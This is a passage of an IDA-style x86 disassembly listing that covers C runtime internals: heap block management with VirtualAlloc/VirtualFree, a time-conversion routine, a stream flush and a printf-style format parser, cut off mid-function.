call dword_40A14C ; VirtualFree
test eax, eax
jz short loc_405274
or dword ptr [edi], 0FFFFFFFFh
dec dword_40E474
mov eax, [esi+0Ch]
test eax, eax
jz short loc_405269
cmp eax, edi
jbe short loc_40526C
loc_405269: ; CODE XREF: sub_40520D+56�j
mov [esi+0Ch], edi
loc_40526C: ; CODE XREF: sub_40520D+5A�j
inc [ebp+var_4]
dec [ebp+arg_0]
jz short loc_405281
loc_405274: ; CODE XREF: sub_40520D+2C�j
; sub_40520D+46�j
sub ebx, 1000h
sub edi, 8
test ebx, ebx
jge short loc_405233
loc_405281: ; CODE XREF: sub_40520D+65�j
cmp [ebp+var_4], 0
mov ecx, esi
mov esi, [esi+4]
jz short loc_4052B8
cmp dword ptr [ecx+18h], 0FFFFFFFFh
jnz short loc_4052B8
push 1
lea eax, [ecx+20h]
pop edx
loc_405298: ; CODE XREF: sub_40520D+9A�j
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_4052A9
inc edx
add eax, 8
cmp edx, 400h
jl short loc_405298
loc_4052A9: ; CODE XREF: sub_40520D+8E�j
cmp edx, 400h
jnz short loc_4052B8
push ecx
call sub_4051B7
pop ecx
loc_4052B8: ; CODE XREF: sub_40520D+11�j
; sub_40520D+7D�j ...
cmp esi, off_40BA54
jz short loc_4052CA
cmp [ebp+arg_0], 0
jg loc_40521A
loc_4052CA: ; CODE XREF: sub_40520D+B1�j
pop edi
pop esi
pop ebx
leave
retn
sub_40520D endp
; =============== S U B R O U T I N E =======================================
sub_4052CF proc near ; CODE XREF: sub_403B18+3A�p
; sub_40915F+173�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov edx, offset off_40BA50
push esi
mov ecx, edx
loc_4052DB: ; CODE XREF: sub_4052CF+1C�j
cmp eax, [ecx+10h]
jbe short loc_4052E5
cmp eax, [ecx+14h]
jb short loc_4052ED
loc_4052E5: ; CODE XREF: sub_4052CF+F�j
mov ecx, [ecx]
cmp ecx, edx
jz short loc_405322
jmp short loc_4052DB
; ---------------------------------------------------------------------------
loc_4052ED: ; CODE XREF: sub_4052CF+14�j
test al, 0Fh
jnz short loc_405322
mov esi, eax
mov edx, 100h
and esi, 0FFFh
cmp esi, edx
jb short loc_405322
mov esi, [esp+4+arg_4]
mov [esi], ecx
mov esi, [esp+4+arg_8]
mov ecx, eax
and cx, 0F000h
sub eax, ecx
mov [esi], ecx
sub eax, edx
pop esi
sar eax, 4
lea eax, [eax+ecx+8]
retn
; ---------------------------------------------------------------------------
loc_405322: ; CODE XREF: sub_4052CF+1A�j
; sub_4052CF+20�j ...
xor eax, eax
pop esi
retn
sub_4052CF endp
; =============== S U B R O U T I N E =======================================
sub_405326 proc near ; CODE XREF: sub_403B18+4D�p
; sub_40915F+1D5�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
sub ecx, [eax+10h]
sar ecx, 0Ch
lea eax, [eax+ecx*8+18h]
mov ecx, [esp+arg_8]
movzx edx, byte ptr [ecx]
add [eax], edx
and byte ptr [ecx], 0
cmp dword ptr [eax], 0F0h
mov dword ptr [eax+4], 0F1h
jnz short locret_40536A
inc dword_40E474
cmp dword_40E474, 20h
jnz short locret_40536A
push 10h
call sub_40520D
pop ecx
locret_40536A: ; CODE XREF: sub_405326+2B�j
; sub_405326+3A�j
retn
sub_405326 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40536B proc near ; CODE XREF: sub_40349C+4A�p
; sub_408845+5F�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, off_40DA70
push edi
loc_405379: ; CODE XREF: sub_40536B+C6�j
mov edx, [esi+10h]
cmp edx, 0FFFFFFFFh
jz loc_405424
mov edi, [esi+8]
lea ecx, [esi+2018h]
mov eax, edi
sub eax, esi
sub eax, 18h
sar eax, 3
shl eax, 0Ch
add eax, edx
cmp edi, ecx
mov [ebp+var_4], eax
jnb short loc_4053DE
loc_4053A4: ; CODE XREF: sub_40536B+6F�j
mov ecx, [edi]
mov ebx, [ebp+arg_0]
cmp ecx, ebx
jl short loc_4053C7
cmp [edi+4], ebx
jbe short loc_4053C7
push ebx
push ecx
push eax
call sub_405573
add esp, 0Ch
test eax, eax
jnz short loc_405436
mov eax, [ebp+var_4]
mov [edi+4], ebx
loc_4053C7: ; CODE XREF: sub_40536B+40�j
; sub_40536B+45�j
add edi, 8
lea ecx, [esi+2018h]
add eax, 1000h
cmp edi, ecx
mov [ebp+var_4], eax
jb short loc_4053A4
jmp short loc_4053E1
; ---------------------------------------------------------------------------
loc_4053DE: ; CODE XREF: sub_40536B+37�j
mov ebx, [ebp+arg_0]
loc_4053E1: ; CODE XREF: sub_40536B+71�j
mov eax, [esi+8]
mov ecx, [esi+10h]
lea edi, [esi+18h]
mov [ebp+var_8], eax
cmp edi, eax
mov [ebp+var_4], ecx
jnb short loc_405427
loc_4053F4: ; CODE XREF: sub_40536B+B5�j
mov eax, [edi]
cmp eax, ebx
jl short loc_405413
cmp [edi+4], ebx
jbe short loc_405413
push ebx
push eax
push [ebp+var_4]
call sub_405573
add esp, 0Ch
test eax, eax
jnz short loc_405436
mov [edi+4], ebx
loc_405413: ; CODE XREF: sub_40536B+8D�j
; sub_40536B+92�j
add [ebp+var_4], 1000h
add edi, 8
cmp edi, [ebp+var_8]
jb short loc_4053F4
jmp short loc_405427
; ---------------------------------------------------------------------------
loc_405424: ; CODE XREF: sub_40536B+14�j
mov ebx, [ebp+arg_0]
loc_405427: ; CODE XREF: sub_40536B+87�j
; sub_40536B+B7�j
mov esi, [esi]
cmp esi, off_40DA70
jz short loc_405446
jmp loc_405379
; ---------------------------------------------------------------------------
loc_405436: ; CODE XREF: sub_40536B+54�j
; sub_40536B+A3�j
mov off_40DA70, esi
sub [edi], ebx
mov [esi+8], edi
jmp loc_40556E
; ---------------------------------------------------------------------------
loc_405446: ; CODE XREF: sub_40536B+C4�j
mov eax, offset off_40BA50
mov edi, eax
loc_40544D: ; CODE XREF: sub_40536B+F8�j
cmp dword ptr [edi+10h], 0FFFFFFFFh
jz short loc_405459
cmp dword ptr [edi+0Ch], 0
jnz short loc_405465
loc_405459: ; CODE XREF: sub_40536B+E6�j
mov edi, [edi]
cmp edi, eax
jz loc_40553A
jmp short loc_40544D
; ---------------------------------------------------------------------------
loc_405465: ; CODE XREF: sub_40536B+EC�j
mov ebx, [edi+0Ch]
and [ebp+var_4], 0
mov esi, ebx
mov eax, ebx
sub esi, edi
sub esi, 18h
sar esi, 3
shl esi, 0Ch
add esi, [edi+10h]
cmp dword ptr [ebx], 0FFFFFFFFh
jnz short loc_405494
loc_405483: ; CODE XREF: sub_40536B+127�j
cmp [ebp+var_4], 10h
jge short loc_405494
add eax, 8
inc [ebp+var_4]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_405483
loc_405494: ; CODE XREF: sub_40536B+116�j
; sub_40536B+11C�j
mov eax, [ebp+var_4]
push 4
shl eax, 0Ch
push 1000h
push eax
push esi
mov [ebp+var_8], eax
call dword_40A150 ; VirtualAlloc
cmp eax, esi
jnz loc_40556C
push 0
push [ebp+var_8]
push esi
call sub_403AC0
mov edx, [ebp+var_4]
add esp, 0Ch
test edx, edx
mov ecx, ebx
jle short loc_4054FB
lea eax, [esi+4]
mov [ebp+var_4], edx
loc_4054D1: ; CODE XREF: sub_40536B+18E�j
or byte ptr [eax+0F4h], 0FFh
lea edx, [eax+4]
mov [eax-4], edx
mov edx, 0F0h
mov [eax], edx
mov [ecx], edx
mov dword ptr [ecx+4], 0F1h
add eax, 1000h
add ecx, 8
dec [ebp+var_4]
jnz short loc_4054D1
loc_4054FB: ; CODE XREF: sub_40536B+15E�j
mov off_40DA70, edi
lea eax, [edi+2018h]
loc_405507: ; CODE XREF: sub_40536B+1A8�j
cmp ecx, eax
jnb short loc_405517
cmp dword ptr [ecx], 0FFFFFFFFh
jz short loc_405515
add ecx, 8
jmp short loc_405507
; ---------------------------------------------------------------------------
loc_405515: ; CODE XREF: sub_40536B+1A3�j
cmp ecx, eax
loc_405517: ; CODE XREF: sub_40536B+19E�j
sbb eax, eax
and eax, ecx
mov [edi+0Ch], eax
mov eax, [ebp+arg_0]
mov [esi+8], al
mov [edi+8], ebx
sub [ebx], eax
sub [esi+4], eax
lea ecx, [esi+eax+8]
lea eax, [esi+100h]
mov [esi], ecx
jmp short loc_40556E
; ---------------------------------------------------------------------------
loc_40553A: ; CODE XREF: sub_40536B+F2�j
call sub_405073
test eax, eax
jz short loc_40556C
mov ecx, [eax+10h]
mov [ecx+8], bl
lea edx, [ecx+ebx+8]
mov off_40DA70, eax
mov [ecx], edx
mov edx, 0F0h
sub edx, ebx
mov [ecx+4], edx
movzx edx, bl
sub [eax+18h], edx
lea eax, [ecx+100h]
jmp short loc_40556E
; ---------------------------------------------------------------------------
loc_40556C: ; CODE XREF: sub_40536B+143�j
; sub_40536B+1D6�j
xor eax, eax
loc_40556E: ; CODE XREF: sub_40536B+D6�j
; sub_40536B+1CD�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40536B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405573 proc near ; CODE XREF: sub_40536B+4A�p
; sub_40536B+99�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_8]
push ebx
push esi
mov esi, [ecx+4]
push edi
mov edi, [ecx]
lea ebx, [ecx+0F8h]
cmp esi, edx
mov [ebp+var_4], edi
mov eax, edi
mov [ebp+arg_0], ebx
jb short loc_4055B8
lea eax, [edi+edx]
mov [edi], dl
cmp eax, ebx
jnb short loc_4055A7
add [ecx], edx
sub [ecx+4], edx
jmp short loc_4055B0
; ---------------------------------------------------------------------------
loc_4055A7: ; CODE XREF: sub_405573+2B�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_4055B0: ; CODE XREF: sub_405573+32�j
lea eax, [edi+8]
jmp loc_405686
; ---------------------------------------------------------------------------
loc_4055B8: ; CODE XREF: sub_405573+22�j
add esi, edi
cmp byte ptr [esi], 0
jz short loc_4055C1
mov eax, esi
loc_4055C1: ; CODE XREF: sub_405573+4A�j
lea esi, [eax+edx]
cmp esi, ebx
jnb short loc_40560B
loc_4055C8: ; CODE XREF: sub_405573+96�j
mov bl, [eax]
test bl, bl
jnz short loc_4055FE
push 1
lea ebx, [eax+1]
pop esi
loc_4055D4: ; CODE XREF: sub_405573+68�j
cmp byte ptr [ebx], 0
jnz short loc_4055DD
inc ebx
inc esi
jmp short loc_4055D4
; ---------------------------------------------------------------------------
loc_4055DD: ; CODE XREF: sub_405573+64�j
cmp esi, edx
jnb short loc_40562F
cmp eax, [ebp+var_4]
jnz short loc_4055EB
mov [ecx+4], esi
jmp short loc_4055F7
; ---------------------------------------------------------------------------
loc_4055EB: ; CODE XREF: sub_405573+71�j
sub [ebp+arg_4], esi
cmp [ebp+arg_4], edx
jb loc_405690
loc_4055F7: ; CODE XREF: sub_405573+76�j
mov edi, [ebp+var_4]
mov eax, ebx
jmp short loc_405603
; ---------------------------------------------------------------------------
loc_4055FE: ; CODE XREF: sub_405573+59�j
movzx esi, bl
add eax, esi
loc_405603: ; CODE XREF: sub_405573+89�j
lea esi, [eax+edx]
cmp esi, [ebp+arg_0]
jb short loc_4055C8
loc_40560B: ; CODE XREF: sub_405573+53�j
lea esi, [ecx+8]
loc_40560E: ; CODE XREF: sub_405573+EB�j
; sub_405573+F2�j
cmp esi, edi
jnb short loc_405690
lea eax, [esi+edx]
cmp eax, [ebp+arg_0]
jnb short loc_405690
mov al, [esi]
test al, al
jnz short loc_405660
push 1
lea ebx, [esi+1]
pop eax
loc_405626: ; CODE XREF: sub_405573+BA�j
cmp byte ptr [ebx], 0
jnz short loc_405650
inc ebx
inc eax
jmp short loc_405626
; ---------------------------------------------------------------------------
loc_40562F: ; CODE XREF: sub_405573+6C�j
lea ebx, [eax+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_405640
sub esi, edx
mov [ecx], ebx
mov [ecx+4], esi
jmp short loc_405649
; ---------------------------------------------------------------------------
loc_405640: ; CODE XREF: sub_405573+C2�j
and dword ptr [ecx+4], 0
lea esi, [ecx+8]
mov [ecx], esi
loc_405649: ; CODE XREF: sub_405573+CB�j
mov [eax], dl
add eax, 8
jmp short loc_405686
; ---------------------------------------------------------------------------
loc_405650: ; CODE XREF: sub_405573+B6�j
cmp eax, edx
jnb short loc_405667
sub [ebp+arg_4], eax
cmp [ebp+arg_4], edx
jb short loc_405690
mov esi, ebx
jmp short loc_40560E
; ---------------------------------------------------------------------------
loc_405660: ; CODE XREF: sub_405573+AB�j
movzx eax, al
add esi, eax
jmp short loc_40560E
; ---------------------------------------------------------------------------
loc_405667: ; CODE XREF: sub_405573+DF�j
lea ebx, [esi+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_405678
sub eax, edx
mov [ecx], ebx
mov [ecx+4], eax
jmp short loc_405681
; ---------------------------------------------------------------------------
loc_405678: ; CODE XREF: sub_405573+FA�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_405681: ; CODE XREF: sub_405573+103�j
mov [esi], dl
lea eax, [esi+8]
loc_405686: ; CODE XREF: sub_405573+40�j
; sub_405573+DB�j
imul ecx, 0Fh
shl eax, 4
sub eax, ecx
jmp short loc_405692
; ---------------------------------------------------------------------------
loc_405690: ; CODE XREF: sub_405573+7E�j
; sub_405573+9D�j ...
xor eax, eax
loc_405692: ; CODE XREF: sub_405573+11B�j
pop edi
pop esi
pop ebx
leave
retn
sub_405573 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405697 proc near ; CODE XREF: sub_40915F+19A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
movzx ecx, byte ptr [edx]
push edi
mov edi, [ebp+arg_0]
and [ebp+var_4], 0
mov eax, ebx
sub eax, [edi+10h]
sar eax, 0Ch
cmp ecx, [ebp+arg_C]
lea edi, [edi+eax*8+18h]
jbe short loc_4056D1
mov eax, [ebp+arg_C]
sub ecx, eax
mov [edx], al
add [edi], ecx
mov dword ptr [edi+4], 0F1h
jmp short loc_405731
; ---------------------------------------------------------------------------
loc_4056D1: ; CODE XREF: sub_405697+26�j
jnb short loc_405738
mov eax, [ebp+arg_C]
lea esi, [edx+eax]
lea eax, [ebx+0F8h]
cmp esi, eax
ja short loc_405738
lea eax, [ecx+edx]
loc_4056E6: ; CODE XREF: sub_405697+59�j
cmp eax, esi
jnb short loc_4056F4
cmp byte ptr [eax], 0
jnz short loc_4056F2
inc eax
jmp short loc_4056E6
; ---------------------------------------------------------------------------
loc_4056F2: ; CODE XREF: sub_405697+56�j
cmp eax, esi
loc_4056F4: ; CODE XREF: sub_405697+51�j
jnz short loc_405738
mov al, byte ptr [ebp+arg_C]
mov [edx], al
mov eax, [ebx]
cmp edx, eax
ja short loc_40572C
cmp esi, eax
jbe short loc_40572C
lea eax, [ebx+0F8h]
cmp esi, eax
jnb short loc_405723
xor eax, eax
mov [ebx], esi
cmp [esi], al
jnz short loc_40571E
loc_405717: ; CODE XREF: sub_405697+85�j
inc eax
cmp byte ptr [esi+eax], 0
jz short loc_405717
loc_40571E: ; CODE XREF: sub_405697+7E�j
mov [ebx+4], eax
jmp short loc_40572C
; ---------------------------------------------------------------------------
loc_405723: ; CODE XREF: sub_405697+76�j
and dword ptr [ebx+4], 0
lea eax, [ebx+8]
mov [ebx], eax
loc_40572C: ; CODE XREF: sub_405697+68�j
; sub_405697+6C�j ...
sub ecx, [ebp+arg_C]
add [edi], ecx
loc_405731: ; CODE XREF: sub_405697+38�j
mov [ebp+var_4], 1
loc_405738: ; CODE XREF: sub_405697:loc_4056D1�j
; sub_405697+4A�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_405697 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405740 proc near ; CODE XREF: sub_4039D6+C9�p
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_0]
sub ebx, 76Ch
cmp ebx, 46h
jl loc_4057FC
cmp ebx, 8Ah
jg loc_4057FC
push esi
push edi
mov edi, [ebp+arg_4]
mov esi, dword_40DEA4[edi*4]
add esi, [ebp+arg_8]
test bl, 3
jnz short loc_40577F
cmp edi, 2
jle short loc_40577F
inc esi
loc_40577F: ; CODE XREF: sub_405740+37�j
; sub_405740+3C�j
call sub_407275
mov eax, ebx
lea ecx, [ebx-1]
imul eax, 16Dh
sar ecx, 2
mov edx, esi
mov [ebp+var_8], esi
add edx, ecx
mov [ebp+var_10], ebx
add eax, edx
mov edx, [ebp+arg_14]
lea ecx, [eax+eax*2]
mov eax, [ebp+arg_C]
mov [ebp+var_1C], eax
lea ecx, [eax+ecx*8]
imul ecx, 3Ch
add ecx, [ebp+arg_10]
imul ecx, 3Ch
add ecx, dword_40DDC0
dec edi
cmp [ebp+arg_18], 1
mov [ebp+var_14], edi
pop edi
pop esi
lea ecx, [ecx+edx+7C558180h]
mov [ebp+arg_0], ecx
jz short loc_4057F2
cmp [ebp+arg_18], 0FFFFFFFFh
jnz short loc_4057F8
cmp dword_40DDC4, 0
jz short loc_4057F8
lea eax, [ebp+var_24]
push eax
call sub_4074E8
pop ecx
mov ecx, [ebp+arg_0]
test eax, eax
jz short loc_4057F8
loc_4057F2: ; CODE XREF: sub_405740+90�j
add ecx, dword_40DDC8
loc_4057F8: ; CODE XREF: sub_405740+96�j
; sub_405740+9F�j ...
mov eax, ecx
jmp short loc_4057FF
; ---------------------------------------------------------------------------
loc_4057FC: ; CODE XREF: sub_405740+13�j
; sub_405740+1F�j
or eax, 0FFFFFFFFh
loc_4057FF: ; CODE XREF: sub_405740+BA�j
pop ebx
leave
retn
sub_405740 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405802 proc near ; CODE XREF: sub_403C0B+44�p
; sub_403C5B+46�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
mov ebx, [esi+10h]
test al, 82h
jz loc_40590B
test al, 40h
jnz loc_40590B
test al, 1
jz short loc_40583A
and dword ptr [esi+4], 0
test al, 10h
jz loc_40590B
mov ecx, [esi+8]
and al, 0FEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_40583A: ; CODE XREF: sub_405802+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and al, 0EFh
or al, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_405874
cmp esi, offset dword_40DF00
jz short loc_405862
cmp esi, offset dword_40DF20
jnz short loc_40586D
loc_405862: ; CODE XREF: sub_405802+56�j
push ebx
call sub_407A5F
test eax, eax
pop ecx
jnz short loc_405874
loc_40586D: ; CODE XREF: sub_405802+5E�j
push esi
call sub_407A1B
pop ecx
loc_405874: ; CODE XREF: sub_405802+4E�j
; sub_405802+69�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_4058E1
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_4058A4
push edi
push eax
push ebx
call sub_40786E
add esp, 0Ch
mov [ebp+arg_4], eax
jmp short loc_4058D7
; ---------------------------------------------------------------------------
loc_4058A4: ; CODE XREF: sub_405802+90�j
cmp ebx, 0FFFFFFFFh
jz short loc_4058BF
mov eax, ebx
mov ecx, ebx
sar eax, 5
and ecx, 1Fh
mov eax, dword_410520[eax*4]
lea eax, [eax+ecx*8]
jmp short loc_4058C4
; ---------------------------------------------------------------------------
loc_4058BF: ; CODE XREF: sub_405802+A5�j
mov eax, offset dword_40DD28
loc_4058C4: ; CODE XREF: sub_405802+BB�j
test byte ptr [eax+4], 20h
jz short loc_4058D7
push 2
push 0
push ebx
call sub_4077D4
add esp, 0Ch
loc_4058D7: ; CODE XREF: sub_405802+A0�j
; sub_405802+C6�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_4058F5
; ---------------------------------------------------------------------------
loc_4058E1: ; CODE XREF: sub_405802+79�j
push 1
lea eax, [ebp+arg_0]
pop edi
push edi
push eax
push ebx
call sub_40786E
add esp, 0Ch
mov [ebp+arg_4], eax
loc_4058F5: ; CODE XREF: sub_405802+DD�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_405901
or dword ptr [esi+0Ch], 20h
jmp short loc_405910
; ---------------------------------------------------------------------------
loc_405901: ; CODE XREF: sub_405802+F7�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_405913
; ---------------------------------------------------------------------------
loc_40590B: ; CODE XREF: sub_405802+10�j
; sub_405802+18�j ...
or al, 20h
mov [esi+0Ch], eax
loc_405910: ; CODE XREF: sub_405802+FD�j
or eax, 0FFFFFFFFh
loc_405913: ; CODE XREF: sub_405802+107�j
pop esi
pop ebx
pop ebp
retn
sub_405802 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405917 proc near ; CODE XREF: sub_403C0B+27�p
; sub_403C5B+29�p ...
var_24C = byte ptr -24Ch
var_4D = byte ptr -4Dh
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24Ch
push ebx
push esi
mov esi, [ebp+arg_4]
xor ecx, ecx
push edi
mov [ebp+var_10], ecx
mov bl, [esi]
inc esi
test bl, bl
mov [ebp+var_14], ecx
mov [ebp+var_30], ecx
mov [ebp+arg_4], esi
jz loc_40608D
mov edi, 800h
mov edx, 200h
jmp short loc_405958
; ---------------------------------------------------------------------------
loc_40594B: ; CODE XREF: sub_405917+770�j
mov ecx, [ebp+var_3C]
mov edx, 200h
mov edi, 800h
loc_405958: ; CODE XREF: sub_405917+32�j
cmp [ebp+var_14], 0
jl loc_40608D
cmp bl, 20h
jl short loc_40597A
cmp bl, 78h
jg short loc_40597A
movsx eax, bl
mov al, [eax+40A1E4h]
and eax, 0Fh
jmp short loc_40597C
; ---------------------------------------------------------------------------
loc_40597A: ; CODE XREF: sub_405917+4E�j
; sub_405917+53�j
xor eax, eax
loc_40597C: ; CODE XREF: sub_405917+61�j
movsx eax, byte_40A204[ecx+eax*8]
sar eax, 4
cmp eax, 7 ; switch 8 cases
mov [ebp+var_3C], eax
ja loc_40607C ; default
jmp off_406095[eax*4] ; switch jump
loc_40599A: ; DATA XREF: seg001:off_406095�o
xor eax, eax ; jumptable 00405993 case 1
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_40], eax
mov [ebp+var_38], eax
mov [ebp+var_28], eax
mov [ebp+var_24], eax
mov [ebp+var_4], eax
mov [ebp+var_2C], eax
jmp loc_40607C ; default
; ---------------------------------------------------------------------------
loc_4059B7: ; CODE XREF: sub_405917+7C�j
; DATA XREF: seg001:off_406095�o
movsx eax, bl ; jumptable 00405993 case 2
sub eax, 20h
jz short loc_4059FA
sub eax, 3
jz short loc_4059F1
sub eax, 8
jz short loc_4059E8
dec eax
dec eax
jz short loc_4059DF
sub eax, 3
jnz loc_40607C ; default
or [ebp+var_4], 8
jmp loc_40607C ; default
; ---------------------------------------------------------------------------
loc_4059DF: ; CODE XREF: sub_405917+B4�j
or [ebp+var_4], 4
jmp loc_40607C ; default
; ---------------------------------------------------------------------------
loc_4059E8: ; CODE XREF: sub_405917+B0�j
or [ebp+var_4], 1
jmp loc_40607C ; default
; ---------------------------------------------------------------------------
loc_4059F1: ; CODE XREF: sub_405917+AB�j
or byte ptr [ebp+var_4], 80h
jmp loc_40607C ; default
; ---------------------------------------------------------------------------
loc_4059FA: ; CODE XREF: sub_405917+A6�j
or [ebp+var_4], 2
jmp loc_40607C ; default
; ---------------------------------------------------------------------------
loc_405A03: ; CODE XREF: sub_405917+7C�j
; DATA XREF: seg001:off_406095�o
cmp bl, 2Ah ; jumptable 00405993 case 3
jnz short loc_405A2B
lea eax, [ebp+arg_8]
push eax
call sub_406153
test eax, eax
pop ecx
mov [ebp+var_28], eax
jge loc_40607C ; default
or [ebp+var_4], 4
neg eax
loc_405A23: ; CODE XREF: sub_405917+121�j
mov [ebp+var_28], eax
jmp loc_40607C ; default
; ---------------------------------------------------------------------------
loc_405A2B: ; CODE XREF: sub_405917+EF�j
mov eax, [ebp+var_28]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
jmp short loc_405A23
; ---------------------------------------------------------------------------
loc_405A3A: ; CODE XREF: sub_405917+7C�j
; DATA XREF: seg001:off_406095�o
and [ebp+var_8], 0 ; jumptable 00405993 case 4
jmp loc_40607C ; default
; ---------------------------------------------------------------------------
loc_405A43: ; CODE XREF: sub_405917+7C�j
; DATA XREF: seg001:off_406095�o
cmp bl, 2Ah ; jumptable 00405993 case 5
jnz short loc_405A66
lea eax, [ebp+arg_8]
push eax
call sub_406153
test eax, eax
pop ecx
mov [ebp+var_8], eax
jge loc_40607C ; default
or [ebp+var_8], 0FFFFFFFFh
jmp loc_40607C ; default
; ---------------------------------------------------------------------------
loc_405A66: ; CODE XREF: sub_405917+12F�j
mov eax, [ebp+var_8]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
mov [ebp+var_8], eax
jmp loc_40607C ; default
; ---------------------------------------------------------------------------
loc_405A7B: ; CODE XREF: sub_405917+7C�j
; DATA XREF: seg001:off_406095�o
cmp bl, 49h ; jumptable 00405993 case 6
jz short loc_405AAD
cmp bl, 68h
jz short loc_405AA4
cmp bl, 6Ch
jz short loc_405A9B
cmp bl, 77h
jnz loc_40607C ; default
or [ebp+var_4], edi
jmp loc_40607C ; default
; ---------------------------------------------------------------------------
loc_405A9B: ; CODE XREF: sub_405917+171�j
or [ebp+var_4], 10h
jmp loc_40607C ; default
; ---------------------------------------------------------------------------
loc_405AA4: ; CODE XREF: sub_405917+16C�j
or [ebp+var_4], 20h
jmp loc_40607C ; default
; ---------------------------------------------------------------------------
loc_405AAD: ; CODE XREF: sub_405917+167�j
cmp byte ptr [esi], 36h
jnz short loc_405AC6
cmp byte ptr [esi+1], 34h
jnz short loc_405AC6
inc esi
inc esi
or byte ptr [ebp+var_4+1], 80h
mov [ebp+arg_4], esi
jmp loc_40607C ; default
; ---------------------------------------------------------------------------
loc_405AC6: ; CODE XREF: sub_405917+199�j
; sub_405917+19F�j
and [ebp+var_3C], 0
loc_405ACA: ; CODE XREF: sub_405917+7C�j
; DATA XREF: seg001:off_406095�o
mov ecx, off_40DA80 ; jumptable 00405993 case 0
and [ebp+var_2C], 0
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_405AF7
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_4060B5
mov bl, [esi]
add esp, 0Ch
inc esi
mov [ebp+arg_4], esi
loc_405AF7: ; CODE XREF: sub_405917+1C5�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_4060B5
add esp, 0Ch
jmp loc_40607C ; default
; ---------------------------------------------------------------------------
loc_405B0F: ; CODE XREF: sub_405917+7C�j
; DATA XREF: seg001:off_406095�o
movsx eax, bl ; jumptable 00405993 case 7
cmp eax, 67h
jg loc_405D53
cmp eax, 65h
jge loc_405BBA
cmp eax, 58h
jg loc_405C19
jz loc_405DC7
sub eax, 43h
jz loc_405BDD
dec eax
dec eax
jz short loc_405BB0
dec eax
dec eax
jz short loc_405BB0
sub eax, 0Ch
jnz loc_405F6B
test word ptr [ebp+var_4], 830h
jnz short loc_405B58
or [ebp+var_4], edi
loc_405B58: ; CODE XREF: sub_405917+23C�j
; sub_405917+45B�j
cmp [ebp+var_8], 0FFFFFFFFh
mov esi, 7FFFFFFFh
jz short loc_405B66
mov esi, [ebp+var_8]
loc_405B66: ; CODE XREF: sub_405917+24A�j
lea eax, [ebp+arg_8]
push eax
call sub_406153
test word ptr [ebp+var_4], 810h
pop ecx
mov ecx, eax
mov [ebp+var_C], ecx
jz loc_405D9B
test ecx, ecx
jnz short loc_405B8E
mov ecx, off_40DA7C
